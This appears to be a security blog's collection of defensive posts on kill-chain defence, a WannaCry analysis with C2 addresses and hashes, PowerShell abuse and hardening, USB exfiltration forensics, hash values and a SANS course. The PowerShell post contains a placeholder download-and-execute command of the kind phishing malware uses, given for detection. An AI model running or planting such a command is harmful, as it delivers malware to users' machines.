Analysing Kill Chain Phases from the Target's Perspective – Part 1

Readers!

As mentioned in my recent LinkedIn update, this is the first article in the series. The mission of this series is to provide more insight into the Kill Chain phases from the target's perspective. The kill chain describes an attacker/adversary and its activities, but there is very little documentation on what targets should be doing. Yes, Lockheed Martin did publish a very good paper on intelligence-driven network defence, but we need to ask ourselves how practical it is to apply the model in our organisation. Consider the following Courses of Action matrix by Lockheed Martin: many organisations are not able to perform most of these actions, and even when they can, there is not much documentation on how to implement them appropriately.

[Screenshot: Courses of Action matrix]

Source: Lockheed Martin

The mission of this blog series is to understand what steps attackers/adversaries take and what we, as targets, are supposed to do in response. By the end of the series, the goal is to create a hybrid set of phases (that also maps to the Kill Chain) covering both the attacker/adversary and the target.

Every attacker/adversary has an INTENT and a MOTIVE to perform an attack. From the highly sophisticated to script kiddies, they all have certain objectives. This means the attacker first needs to find their target. So for me the first phase should be Target Determination – determining a target that fits the attacker's/adversary's objectives. We can divide attackers/adversaries into two groups:

  1. Insiders – disgruntled employees or ex-employees.
  2. Outsiders – nation-state attackers, cyber criminals, script kiddies, hacktivists etc.

A few common motivations:

  1. Financial gain
  2. Fame or vouches – required to gain the trust of underground groups or hacker collectives
  3. Damage or disrupt services
  4. Cyber espionage
  5. Personal grievances.
  6. Political motivation

Intent is sometimes hard to prove, but in most cases our adversaries' intentions are malicious.

Thus, before anything else, they will decide on one or multiple targets that fit their motivations, or let's say objectives. Only after deciding on a target will they perform Reconnaissance or Target Profiling. Where the attackers/adversaries look depends on the target. A target can be a single entity, an organisation, or a nation/country.

Single entity as a target – for example a CEO. The intention is to get close and gather as much information as possible about that person.

  1. Social media and social mentions.
  2. The target's habits and lifestyle.

Organisation as a target

  1. Social media and social mentions.
  2. Technical information about the organisation, especially externally facing applications.
  3. Known and publicly announced breaches.
  4. Organisation data dumps on the public/private web.

Nation/country as a target – This is politically motivated and the intention is mostly to harm the nation or country. A recent example is the NotPetya malware attack against Ukraine, where the attackers/adversaries understood their target, profiled it and launched the attack.

In all cases, the better an attacker/adversary profiles their target, the more effective the attack will be.

The question is how a target can use this. Compared to the organisation itself, adversaries have to actually gather a lot of information about a target before an attack; the organisation already knows all of that information but is not using it for its own benefit.

“Charity begins at home and intelligence begins with your logs”

This means that while attackers/adversaries spend days, weeks or months collecting information about their target, you as an organisation already have this information but are not using it to gain a tactical advantage over your adversaries. So what should a target do?

  1. Know what type of information is available publicly, understand the risk, how it can be used by an attacker and what type of attacks can leverage this information.
  2. Know what type of information is available on underground/private forums or websites, understand the risk, how it can be used by an attacker and what type of attacks can leverage this information.
  3. Act on any successful breaches and exfiltrated data. If email addresses were seen on Pastebin, don't just change credentials; understand that these email addresses can be used for phishing or spoofing. Ideally, change the email addresses and convert the breached ones into honeypot addresses. This will help you understand the type of attackers targeting your organisation.
  4. Know how your security controls respond to inbound reconnaissance attempts. The information they send back can be used to map the network or identify the type of device stopping the adversary – for example, an inbound scan blocked by a firewall that responds with an ICMP network-unreachable message.
  5. Websites such as Google and Shodan can be used to collect a lot of information about a target and should therefore be monitored, especially for accidental uploads by internal employees – e.g. an employee uploading an Excel sheet with organisation data to VirusTotal just to make sure there is no malware in it. Proactively monitoring this lets you contact the respective parties to take the data offline before entities with malicious intent get their hands on it. A small sketch of such monitoring follows this list.
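As an illustration of point 5, here is a minimal PowerShell sketch that checks what Shodan already exposes about your external footprint via its search API. The organisation name is a hypothetical placeholder and the API key is read from an environment variable; treat it as a starting point, not a monitoring solution.

```powershell
# Minimal sketch: query the Shodan search API for hosts attributed to your organisation.
# 'Example Corp' is a hypothetical placeholder; a Shodan API key is expected in SHODAN_API_KEY.
$apiKey = $env:SHODAN_API_KEY
$query  = 'org:"Example Corp"'
$uri    = "https://api.shodan.io/shodan/host/search?key=$apiKey&query=$([uri]::EscapeDataString($query))"

$results = Invoke-RestMethod -Uri $uri

# Summarise the exposed services so they can be compared against what is expected to be external.
$results.matches |
    Select-Object ip_str, port, transport, org |
    Sort-Object ip_str, port |
    Format-Table -AutoSize
```

The same query can be scheduled and diffed over time so that newly exposed services are flagged before an adversary finds them.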

Red team assessments are a very good place to start with the points mentioned above. Organisations can also engage their security operations teams or security service providers to perform these actions. Frequency depends on the organisation's capability to invest in resources.

With this I will end part 1.

Have a good weekend!


Yet another WannaCry Ransomware – Analysis

Recently, organisations have been targeted with new ransomware labelled WannaCry.

Being curious, I downloaded a sample to understand how the malware actually behaves. The tests were performed on a VM connected to the internet and on one NOT connected to the internet. In both tests, the machine was successfully infected.

Sample analysed: 84c82835a5d21bbcf75a61706d8ab549

As seen in the screenshot, the executable is "Wana Decryptor 2.0".

The following screenshot shows the process tree.

[Screenshot: process tree]

As shown in the process tree above, the malware creates taskhsvc.exe, which contains Tor data and the following C2 server addresses:

  • 57g7spgrzlojinas.onion
  • gx7ekbenv2riucmf.onion

Looking at the memory dump of @WanaDecryptor@.exe, I identified the same domains along with additional .onion sites:

  • xxlvbrloxvriy2c5.onion
  • 76jdd2ir2embyv47.onion
  • cwwnhwhlz52maqm7.onion

Using .onion domains for C2 communication is a technique to keep the infrastructure resilient.

The sample, in my opinion, is a packer/installer that unpacks the files shown in the screenshot below and also creates @WanaDecryptor@.exe, which runs continuously as a process. It is worth noting that the folders "msg" and "TaskData" were only created when the infected VM was connected to the internet. I will explain each file in a later section.

Below are the MD5 hashes of the files in the "TaskData" folder (a quick sketch of how such a listing can be generated follows the list).

MD5 (./TaskData/Tor/libeay32.dll) = 6ed47014c3bb259874d673fb3eaedc85
MD5 (./TaskData/Tor/libevent-2-0-5.dll) = 90f50a285efa5dd9c7fddce786bdef25
MD5 (./TaskData/Tor/libevent_core-2-0-5.dll) = e5df3824f2fcad0c75fd601fcf37ee70
MD5 (./TaskData/Tor/libevent_extra-2-0-5.dll) = 6d6602388ab232ca9e8633462e683739
MD5 (./TaskData/Tor/libgcc_s_sjlj-1.dll) = 73d4823075762ee2837950726baa2af9
MD5 (./TaskData/Tor/libssp-0.dll) = 78581e243e2b41b17452da8d0b5b2a48
MD5 (./TaskData/Tor/ssleay32.dll) = a12c2040f6fddd34e7acb42f18dd6bdc
MD5 (./TaskData/Tor/taskhsvc.exe) = fe7eb54691ad6e6af77f8a9a0b6de26d
MD5 (./TaskData/Tor/tor.exe) = fe7eb54691ad6e6af77f8a9a0b6de26d
MD5 (./TaskData/Tor/zlib1.dll) = fb072e9f69afdb57179f59b512f828a4
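If you are reproducing this on a Windows analysis VM, a similar listing can be generated with a short PowerShell sketch (it assumes the extracted "TaskData" directory sits in the current working folder):

```powershell
# Recursively hash the extracted TaskData folder and print md5-style output lines.
Get-ChildItem '.\TaskData' -Recurse -File | ForEach-Object {
    $hash = Get-FileHash -Path $_.FullName -Algorithm MD5
    'MD5 ({0}) = {1}' -f $hash.Path, $hash.Hash.ToLower()
}
```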

The folder "msg" contains language packs, which also get encrypted and receive the ".wnry" extension.

Below are the files that were created:

  1. @Please_Read_Me@
  2. @WanaDecryptor@.exe
  3. 00000000.res – data for C2 communication
  4. c.wnry – contains links to the .onion sites and the Tor browser
  5. f.wnry – list of random files that are encrypted
  6. u.wnry – the @WanaDecryptor@.exe decrypter file
  7. b.wnry – bitmap file containing decryption details
  8. r.wnry – further information about decryption and instructions for the decryption tool
  9. s.wnry – Tor zip file
  10. t.wnry – encryption format instructions
  11. 00000000.eky – the infected machine's RSA private key (stored encrypted)
  12. 00000000.pky – RSA-2048 public key used for encryption
  13. taskdl.exe – file deletion tool
  14. taskse.exe – enumerates RDP sessions and executes the malware – the Tor process runs underneath
  15. msg – language packs. See screenshot below.
  16. TaskData – Tor browser executable and supporting files. See screenshot below.

When the malware was executed, it queried the following domains:

– tor.relay.wardsback.org
– tor.ybti.net
– javadl-esd-secure.oracle.com
– belegost.csail.mit.edu
– tor1.mdfnet.se
– zebra620.server4you.de
– maatuska.471.se

The system also communicated with 212.47.241.21, which resolves to sa1.sblo.ch. I ran the malware again and this time it went to different domains:

– tor.dizum.com
– tor1e1.digitale-gessellschaft.ch
– lon.anondroid.com

This is likely because the malware uses Tor. Analysing the Tor process showed multiple hard-coded IP addresses. Here you can find all the directory servers used by Tor.

Extensions that get encrypted:

[Screenshot: list of file extensions targeted for encryption]

Extract from PE Explorer:

[Screenshot: PE Explorer extract]

The extract from Sysmon can be found in the sysmon logs.

WannaCry Fact Sheet – Here.

Kill-chain Phases – Here.

Final Words:

  1. The malware was not delivered via phishing but via the EternalBlue exploit, taking a non-traditional route to infect systems.
  2. No obfuscation was done – meaning when you open the executable you can see the functions.
  3. The use of an exploit such as EternalBlue suggests that access to vulnerable systems without user interaction is available. The only reason we detected this one is that the attacker used EternalBlue for financial gain – the WannaCry ransomware – whereas others could simply gain access to systems and quietly perform other tasks. The motive, based on the evidence, is financial gain.
  4. Patching systems would definitely have helped; however, we must remember that the exploit was only used after the Shadow Brokers dump. The group's intention may have been to expose the NSA and its tools, but the exploit was then used for financial gain. So even if the intention of exposing the NSA may have been good, it ended up doing more damage.
  5. A number of articles say that the creators of the malware made mistakes and earned only around 55K. However, one must remember that all of that money was paid as ransom, and one must also consider the overall impact of the attack. Even though we cannot easily quantify the time spent patching systems, re-imaging infected machines, and people globally being out of production, it is not small. Some analysis suggests the attackers were not sophisticated, but it worked.
  6. Would host-based security controls have helped? Controls such as application whitelisting, no admin rights for logged-in users, and use of AppLocker in Windows may have helped reduce the impact. However, how feasible is it to apply these in a corporate environment?

 

PowerShell : Tool for Admins and Adversaries

Readers!

Over the last couple of weeks I have been analysing malware, mostly delivered via phishing attempts. What our adversaries do is first gain easy access to the machine via phishing and create background processes that call out to compromised domains, which download an executable packed with a malicious payload. Below is a basic timeline of a phishing email with an attachment.

[Screenshot: timeline of a phishing email with attachment]

The technique is neither new nor unique; however, if we look for a trend, we can see that most of these attacks use similar tools and procedures. One such tool is PowerShell. This blog is not about what PowerShell is, but about how our adversaries are using a tool that was created to automate admin tasks within the Windows environment. As automation was one of the key goals, PowerShell was given scripting capabilities, which allow admin tasks such as configuration management to be automated. And there I go explaining what PowerShell is anyway.

Microsoft certainly did not design the tool primarily with security in mind, and to this date one can use PowerShell to perform malicious activities. However, certain controls and functionality within PowerShell can help us control what type of scripts can run on our systems.

There are indeed multiple security controls, which we will discuss later in the blog, but first let's see what our adversaries are doing. I will not go into the specific analysis of a particular malware sample, as I am trying to reach the teams responsible for detecting/preventing these types of attacks by placing feasible and actionable security controls around PowerShell.

Below is a sample PowerShell command seen in most cases:

[Screenshot: sample malicious PowerShell command]
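A representative, defanged reconstruction of such a command (the domain and file names are placeholders, not real indicators of compromise) looks like this:

```powershell
# Illustrative only – placeholder domain and file names, not real IOCs.
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command "(New-Object System.Net.WebClient).DownloadFile('http://example.com/invoice.exe','C:\Users\Public\invoice.exe'); Start-Process 'C:\Users\Public\invoice.exe'"
```

Each of the parameters this style of command relies on is described below.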

Frequently used parameters:

  1. -ExecutionPolicy Bypass – Execution policies in PowerShell determine whether scripts can run and what type of scripts can run, and set the default policy. Microsoft added a value called 'Bypass' which, when used, bypasses the currently assigned execution policy and runs the script without any warnings. Commonly used execution policies are:
    1. Restricted
    2. Unrestricted
    3. AllSigned
    4. RemoteSigned
  2. -WindowStyle Hidden – used when the PowerShell script needs to run in the background without the user's knowledge.
  3. -NoProfile – a PowerShell profile is a set of commands (it is actually a PowerShell script) normally run for the current user and host at start-up. Setting -NoProfile launches the script without loading any profiles.
  4. DownloadFile – a method of System.Net.WebClient used to download a file over the web.

Tools, Techniques and Procedures:

  1. The attachments, as shown in the first screenshot, are mostly Word/Excel documents with macros, or zip files containing JavaScript.
  2. The macros or JS are heavily obfuscated, and sometimes only lightly. For heavily obfuscated scripts I rely on dynamic analysis (the best way to know what the malware was written to do). Some scripts, with practice, I can deobfuscate within minutes.
  3. The PowerShell commands mostly download the file from sites over HTTP rather than HTTPS (though some sophisticated adversaries have created/compromised HTTPS websites). I have also sometimes noticed cmd.exe /c being used, which invokes the specified command and then terminates.
  4. The file on the compromised domain is mostly a Windows executable with an '.exe' extension, or sometimes the extension is hidden. This depends on the adversary and the packers they have used. Sometimes you can unpack the 'exe' with 7zip.
  5. Based on the command, the file is first downloaded and then executed. In certain cases I have seen the file deleted after execution. Again, it depends on the command.
  6. Most malware samples that I have analysed were either ransomware or information stealers, and sometimes a combination of both.
The above TTPs are very simple to understand; however, implementing security controls for each step to detect and prevent them is much harder. As a team or as individuals we are working towards reducing the impact of an incident. Consider the phases of the cyber kill chain, perform an analysis of incidents within your team, and understand at which phase you are able to catch the adversary – and whether you can do it earlier.

Observables such as IP addresses, domains, URLs and file hashes with context are the IOCs that we normally look for and use for detection and prevention. Some people call that Threat Intelligence. Darwin would have gone: "Seriously?"


Security controls such as endpoint solutions, proxies, IDPS and firewalls can help, but they are heavily dependent on what they already know, and history has shown us that they can be bypassed. They are still very good controls for reducing impact and/or preventing known attacks or IOCs.

What we need is security controls based on TTPs. So let's look at some controls that can be implemented to detect and/or prevent such attacks:

  1. DO NOT give admin privileges to the local account. If required for a role, use an admin password generator with User Account Control (UAC) enabled, so that an Administrator password prompt appears every time a system change is made, such as installing a program or running an admin task.
  2. Use group policies so that certain tasks, especially script execution and writing to the registry and the Windows directory, are only allowed for Administrators. Administrative Templates can be used for this.
  3. Use group policy to prevent any executable in the TEMP directory from being saved/executed.
  4. Sign all PowerShell scripts. If that is not possible, or the team is not willing to sign, the restrictions placed via the points above can assist.
  5. The Execution Policy can also be set to Restricted, so that PowerShell can only be used interactively and will not run scripts. Organisations that do not push any policies via PowerShell can choose this option.
  6. Application whitelisting – Windows AppLocker. The tool can help define what level of access a user has on the system with regards to executables, scripts and DLLs.
  7. Running AppLocker in allow mode, with a rule that only scripts in trusted locations can run on the system, can assist the team. An attacker can rewrite the rule provided he/she has admin privileges on the system.
  8. PowerShell language modes – an admin can set the language mode to Constrained Language Mode, which permits all Windows cmdlets and all Windows PowerShell language elements but limits the permitted types. It has a list of types that are allowed within a PowerShell script; for example, the New-Object cmdlet can only be used with allowed types, which do not include System.Net.WebClient.
  9. Logging of PowerShell is also important. Here, in my opinion, Sysmon is a must-have; the logs can be forwarded to a SIEM for correlation. If Sysmon is not feasible, enabling PowerShell module logging is highly recommended. Enhanced logging is always recommended and I will write another blog on that. A small sketch of checks for points 5, 8 and 9 follows this list.
  10. The organisation's proxy should be configured properly to detect/prevent web requests invoked via PowerShell. I have tested Invoke-WebRequest, which shows 'WindowsPowerShell' within the User-Agent string; however, no User-Agent string was noted when the DownloadFile method mentioned above was used. Maybe proxies can be configured to disallow any traffic without a User-Agent – I still have to verify whether such functionality exists. If not, a SIEM rule can be used to alert on web traffic with no User-Agent string going to external sites and downloading files.
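As a starting point for points 5, 8 and 9, below is a minimal PowerShell sketch, assuming Sysmon is installed and logging to its default operational channel, that reviews the execution policy, confirms the language mode, and hunts Sysmon process-creation events for the suspicious parameters discussed earlier:

```powershell
# Minimal sketch of quick checks for points 5, 8 and 9 above.
# Assumes Sysmon is installed and logging to its default operational channel.

# Point 5: review the effective execution policy for each scope.
Get-ExecutionPolicy -List

# Point 8: confirm whether the current session runs in Constrained Language Mode.
# (In that mode, `New-Object System.Net.WebClient` fails because the type is not allowed.)
$ExecutionContext.SessionState.LanguageMode

# Point 9: hunt recent Sysmon process-creation events (Event ID 1) for PowerShell
# launched with the suspicious parameters discussed earlier in this post.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents 500 |
    Where-Object { $_.Message -match 'powershell\.exe.*(-WindowStyle\s+Hidden|-ExecutionPolicy\s+Bypass|DownloadFile)' } |
    Select-Object TimeCreated, Message
```

In practice these checks would be rolled out via configuration management, and the hunting query would live in the SIEM rather than be run ad hoc on an endpoint.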

Please note that AppLocker and PowerShell Constrained Language Mode are not security boundaries on their own, but another layer of defence that can help reduce the impact of an attack and, in some cases, completely prevent the execution of foreign scripts.

When making a business case to the board or C-level executives for any changes in the organisation, the presenter should use language they understand. As part of the evidence, it is highly recommended to show actual incidents where current security controls failed and impacted user productivity, caused loss of data, and cost hours to recover and restore systems. They want to know how any suggested changes will help reduce the impact on the user or the business.

If there are other methods that other organisations are using please let me know.

A good read – PowerShell for Blue Team

 

Finding Evidence of Data Exfil – USBStor artefacts

Readers!

Last year, one of the members of the SANS DFIR community posted a question about identifying whether any data leakage had occurred in the environment via a USB thumb drive. As evidence, the investigator had USBStor artefacts. Shell bag analysis (TZWorks sbag) showed a large number of files touched (reg-UTC) within a very short time period, and a few with the MRU (most recently used) flag set at different times.

This blog is a concise write-up of the tips provided by myself and other members. These tips helped the investigator support the theory of data leakage.

  1. Evaluate the USB dates as a group. If a number of artefacts are detected with the exact same timestamp, investigate further; such artefacts indicate that they were somehow modified. It is also worth the effort to carve the data for deleted registry files and look for the relevant keys there.
  2. Normal users will often access files again after copying them to removable media, to make sure the files were copied correctly and are not corrupted. This operation leaves shell items in the form of shell bags and link (.lnk) files. One can use the Windows time rules to look for evidence of a file copy. Using the time rules, examine the link files whose target data points to files on removable media (TZWorks 'lp' is excellent for this). If the modified date of the target file data in the link file precedes the created date of the target file data in the link file, this is an indication that the file was opened from the removable media after it was copied there. This means that even without access to the removable media, you can state that files were copied to the removable media and then opened from it. The created date of the target data in the link file is when the file was copied to the removable media. One can state that the files were copied, but cannot state where the file was copied from, as that is not tracked.
  3. To determine when the file was opened from the removable media, look at the times of the link file itself. The created date of the link file will be the first time the file was opened, and the modified date of the link file will be the last time the file was opened. To identify the removable media, locate the volume serial number of the removable media's file system, which is stored in the link file's data. Correlate the volume serial number to the data from your USB drive analysis and you will get the manufacturer's unique serial number for that removable media. Search for that unique serial number across your enterprise and you will discover other machines the drive was connected to. Correlate the link file target data with the shell bag data and you should be able to build a neat timeline of what happened on the system.
  4. Memory analysis of the system can assist. If the files were copied, there should be data on the clipboard. Drag and drop will not likely leave any artefacts.
  5. Registry hives – one can use FTK Registry Viewer for ease. USBStor entries have last-written values – the dates when the device was last accessed or connected.
  6. Look at the recent files in Windows. Even if one is not able to open the file, it may show which file came from which volume. It may not prove that the file was copied, but if the document name is 'organisationconfidential' then you can argue what that file was doing on a USB drive. The link files should also contain the volume serial number that one can match/compare with removable media serials. A quick triage sketch for points 5 and 6 follows this list.
  7. Registry restore points can also be used to check last-written dates.
  8. Look at the MFT records – they have source MFT and destination MFT entries.
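For points 5 and 6, below is a minimal live-triage sketch in PowerShell. It is not a replacement for the forensic tools mentioned in this post (sbag, lp, FTK Registry Viewer); it assumes a live system, or a mounted image whose SYSTEM hive is loaded under HKLM, and the drive-letter filter is an assumption to adjust per case.

```powershell
# Enumerate USB mass-storage devices recorded under USBSTOR (vendor/product + unique serial).
Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR' | ForEach-Object {
    $device = $_
    Get-ChildItem $device.PSPath | ForEach-Object {
        [PSCustomObject]@{
            Device       = $device.PSChildName                      # vendor/product string
            SerialNumber = $_.PSChildName                           # manufacturer unique serial
            FriendlyName = (Get-ItemProperty $_.PSPath).FriendlyName
        }
    }
}

# List recent .lnk files whose target points at a removable drive letter (adjust the range),
# surfacing the link's created/modified times for the "first/last opened" reasoning above.
$shell = New-Object -ComObject WScript.Shell
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Recent" -Filter *.lnk | ForEach-Object {
    $target = $shell.CreateShortcut($_.FullName).TargetPath
    if ($target -match '^[E-H]:\\') {
        [PSCustomObject]@{
            LinkFile     = $_.Name
            Target       = $target
            LinkCreated  = $_.CreationTime       # ~ first time the file was opened
            LinkModified = $_.LastWriteTime      # ~ last time the file was opened
        }
    }
}
```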

Tools mentioned: SBE (ShellBags Explorer) and MFTparser

Links mentioned:

https://files.sans.org/summit/Digital_Forensics_and_Incident_Response_Summit_2015/PDFs/PlumbingtheDepthsShellBagsEricZimmerman.pdf

 

Hash Values – A Trivial Artefact

Readers!

Merry Christmas and a Happy New Year to all. The days of holiday spam and vendor predictions are here.

Here I am, spending a summer afternoon watching TV and writing on my blog. As I am a bit lazy during the holidays, I am posting something simple. The post is about hash values, a seemingly trivial artefact, and how they help in identifying malicious files/programs.

You can read about Hash here.

Hash values are important, first of all, for verifying files. Think of a hash as a signature or footprint. Just as living beings have signatures or footprints by which we can recognise them, files have a digital footprint by which we can identify them.

Take HashCalc as an example. The following screenshot shows the different hash values of HashCalc.exe.

[Screenshot: HashCalc output for HashCalc.exe]

As you can see, HashCalc provides a lot of information (the digital footprint) about itself. With regards to security, hashes are normally used to verify a file, as mentioned earlier. Let's look briefly at the commonly used hash values (a PowerShell sketch for computing them follows the list):

  • MD5 – based on the Message Digest algorithm. Normally represented as 32 hexadecimal digits. Vulnerable to collision attacks. Read further here.
  • SHA-1 – Secure Hash Algorithm 1. Represented as 40 hexadecimal digits and generates a 160-bit message digest. Vulnerable to collision attacks and being deprecated in favour of SHA-2 and SHA-3. Read further here.
  • SHA-256 – part of the Secure Hash Algorithm 2 (SHA-2) family, which defines six digest functions (SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256). SHA-256 is represented as 64 hexadecimal digits. Read further here.
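If you do not have HashCalc to hand, the same values can be computed with PowerShell's built-in Get-FileHash cmdlet (available from PowerShell 4.0); the path below is just an example location:

```powershell
# Compute the commonly used hashes of a file with the built-in Get-FileHash cmdlet.
$file = 'C:\Tools\HashCalc.exe'     # example path – point this at any file of interest

foreach ($algorithm in 'MD5', 'SHA1', 'SHA256') {
    Get-FileHash -Path $file -Algorithm $algorithm | Select-Object Algorithm, Hash
}
```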

Now, why this blog entry, when the information is available on Google and Wikipedia? The reason is that hash values are a seemingly trivial yet important artefact in the Threat Intelligence and cyber security world. Lots of OSINT and vendor intelligence systems share the hash values of known malware droppers. These could be executables, MS Office documents, Adobe documents, image files etc.

Following are a few scenarios where hash values can assist:

  • Hash values can help identify whether the file/program that we have is legitimate or not.
  • Malware analysis blogs will almost always provide the hash value of the identified file/program.
  • Hash values are also used by endpoint solutions to detect known malicious files/programs.
  • During incident response, one can also use hash values in YARA rules to detect malicious files/programs.
  • Organisations can keep a list of the hash values of known-good and authorised programs, which can then be used to identify unwanted programs on a system, either via the endpoint for real-time detection and/or during incident response (see the sketch after this list). Benchmarking/baselining is a complicated process and sometimes not feasible in large organisations.
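As a rough illustration of that last point, the sketch below compares the SHA-256 hashes of executables on disk against a known-good baseline. The file 'known_good.csv' (with a SHA256 column) is a hypothetical baseline you would build yourself, for example from the NIST reference data mentioned below.

```powershell
# Flag executables whose SHA-256 hash is not in the known-good baseline (hypothetical CSV).
$baseline = Import-Csv 'C:\Baseline\known_good.csv' | Select-Object -ExpandProperty SHA256

Get-ChildItem 'C:\Program Files' -Recurse -Include *.exe -ErrorAction SilentlyContinue |
    ForEach-Object {
        $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
        if ($baseline -notcontains $hash) {
            [PSCustomObject]@{ Path = $_.FullName; SHA256 = $hash }   # unknown to the baseline
        }
    }
```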

NIST provides a list of known-good hash values of legitimate programs (the National Software Reference Library), which one can use to compare good vs bad. Read here.

Hash values are just another indicator, but one that gives more targeted detection of malicious files/programs. IP addresses and URLs are dynamic, not 100% reliable and have a low confidence level as threat indicators, which is why hash values are considered an important artefact in the security world.

Happy Holidays!

 

SANS FOR578 Cyber Threat Intelligence – Course Review

Readers!!!

Advance greetings for Christmas. Before I start, make sure to check out the SANS Holiday Hack Challenge here.

Recently I was honoured to attend one of the SANS courses, FOR578 – Cyber Threat Intelligence. The instructor was one of the best in the business, Robert M. Lee. My reason for attending SANS training is purely that they are one of the best security training providers, and when they announced FOR578 last year I was very keen to see SANS' take on threat intelligence. I have been self-learning about threat intelligence via Lockheed Martin and various webcasts from SANS and other providers, and realised that every vendor has a different approach to threat intelligence.

I had prior knowledge of threat intelligence, and this course helped me get the best out of it.

By the end of the first day, I had a very good understanding of what intelligence is and how it is associated with cyber threats. Most of the time, in the name of Threat Intelligence, vendors or service providers end up sharing threat indicators with some nice dashboards and portray the system as a Threat Intelligence platform. I have always said that we need to move beyond indicator-based systems (yes, it is still good to have those) and concentrate more on the tools, techniques and procedures of our adversaries. The content of the course aligned with my thinking, helped me sharpen it, and showed how to actually implement it in real life.

During the course I learned how to track a threat actor or a campaign and how to best present that information across your organisation. Tools such as CRITs, MISP and threat_note were used. The Kill Chain model and the Diamond Model were explained in detail, and the labs were designed to put these models into practice.

One of the interesting labs was to review a vendor threat intelligence report. The report could be about an APT, an analysis of a threat actor, or generic briefings on cyber threats across the globe. In this exercise we learned about biases and how multiple inputs to a single report may change its actual outcome or the identification of the adversary.

Other labs covered extracting intelligence out of vendor reports, tracking a campaign, what artefacts to collect during an intelligence exercise, and how to provide evidence for your hypotheses, as well as how to share threat information via STIX, YARA and OpenIOC. The course also includes very good real-life case studies.

At the end of the fifth day, I knew what actual threat intelligence means and how we can use it in our organisation.

For those who are thinking of taking the course, I would highly recommend it.

Evoltin POS Malware – Kill Chain Mind Map

Readers!!!

It has been quite a while since I updated my blog, as I have been spending some quality time off work with family.

Recently I was honoured to attend the SANS FOR578 Cyber Threat Intelligence course taught by Robert M. Lee, and it was excellent. I will write a separate blog post reviewing the course later.

Being in a customer service environment, I have realised how important data visualisations are. When you are presenting your findings to C-level executives, having tables, charts and graphics in the report makes it easier to grasp and understand the analyst's (or whoever wrote the report's) point of view. We can visualise our findings about organisational risks, threats, incidents and many other departmental attributes in different ways.

For me, the best visualisation is mind maps, and I have used them to represent processes, procedures, incidents etc. I also use mind maps when I am performing investigations during IR, forensics and/or threat hunting. They help me track my investigation steps and findings. If the incident continues into the next business day, the mind map helps me pick up where I left off and lets me trace back my steps, rather than digging through spreadsheets, other textual notes or a case management system.

During the course, there was a strong emphasis on making sure investigation or intelligence-gathering information is represented in a manner that all levels of audience can understand. That is when I thought of creating a mind map of a malware sample, its behaviour, and how it can be represented across the Kill Chain phases.

[Mind map: Evoltin POS malware (aka NitlovePOS) mapped to Kill Chain phases]

The mind map above shows the Kill Chain phases for the Evoltin POS malware, the indicators identified during analysis, and how they can be associated with the different Kill Chain phases. Rather than presenting them in a table or chart, I believe the mind map view is much easier to grasp and better presented.

I will be creating more mind maps and uploading them to my GitHub account. I normally upload IOCs to AlienVault OTX, Blueliv, GitHub and ThreatConnect, but now I will also create a similar Kill Chain mind map for every investigation I do.

Happy Mind Mapping!!!!!